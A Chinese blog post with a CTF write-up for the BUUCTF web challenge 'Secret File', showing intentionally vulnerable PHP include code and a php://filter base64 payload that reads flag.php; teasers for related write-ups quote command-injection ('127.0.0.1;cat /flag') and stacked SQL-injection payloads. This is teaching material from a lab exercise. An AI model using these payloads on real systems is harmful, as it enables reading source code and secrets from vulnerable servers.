当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

七星3个月前 (01-21)BUU122

f12, 获得Archive_room.php

访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来

开burpsuite, 抓取回显包, 得到secr3t.php

访问,成功获得源码

highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(
stristr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
  echo
"Oh no!";
  exit();
}
include(
$file);
//flag放在了flag.php里
?>
和之前的题有共同点, include的base64显示php源代码:

?file=php://filter/read=convert.base64-encode/resource=flag.php

但在这之前多了个if判断,仔细看看, 好像没啥用,直接传过去获得flag:


七星|qixingbit.com

相关文章

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

打开题, 发现是个计算器,传入表达式,计算结果,乍一看没啥问题然后祖传的f12, 首先看到的就是一个祖传的注释:<!--I've set up WAF to ensure security.--...

BUUCTF_web_第十题:[ACTF2020 新生赛]Exec

BUUCTF_web_第十题:[ACTF2020 新生赛]Exec

打开靶场, 和之前的linux系统命令执行一样, 但是这个没过滤, 直接127.0.0.1||cat /flag或者127.0.0.1;cat /flag就好了...

BUUCTF_web_第五题:[SUCTF 2019]EasySQL

BUUCTF_web_第五题:[SUCTF 2019]EasySQL

[SUCTF 2019]EasySQL打开题目,发现一个搜索框,尝试发现是堆叠注入,先查一下数据库:1;show databases;得到:Array ( [0] => 1 )Array ( [...

BUUCTF_web_第14题:[极客大挑战 2019]Http

BUUCTF_web_第14题:[极客大挑战 2019]Http

打开是个常规的主页,依旧是祖传的f12,仔细看,有个Secret.php这是仅有的线索, 访问一下喽:提示:It doesn't come from 'https://www.Sycsecret.co...

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

开靶场, 有三个文件链接,依次点开, 有个提示:flag in /fllllllllllllag然后观察url发现,访问文件是需要提交一个filehash值的:/file?filename=/flag...

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。